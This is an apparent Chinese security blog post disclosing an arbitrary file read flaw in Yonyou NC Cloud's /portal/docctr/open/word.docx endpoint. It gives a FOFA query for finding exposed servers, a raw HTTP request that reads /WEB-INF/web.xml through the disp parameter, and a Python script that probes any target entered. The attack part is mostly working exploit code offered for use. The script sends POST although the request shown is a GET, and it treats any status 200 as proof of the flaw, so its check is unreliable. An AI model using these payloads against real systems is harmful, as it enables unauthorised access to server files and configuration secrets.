用友NC word.docx接口存在任意文件读取漏洞
声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、产品介绍
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。
二、漏洞描述
用友NC Cloud word.docx接口存在任意文件读取漏洞
三、fofa语法
body="UClient.dmg"
四、漏洞复现
poc
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
五、poc.py
import requests
def verify(ip):
url = f'{ip}/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml'
headers = {
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept': ' * / *',
'Connection': 'Keep - Alive'
}
try:
response = requests.post(url, headers=headers)
print(response)
# 验证成功输出相关信息
if response.status_code == 200:
print(f"{ip}存在用友NC word.docx接口任意文件读取漏洞!!!")
else:
print('漏洞不存在')
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)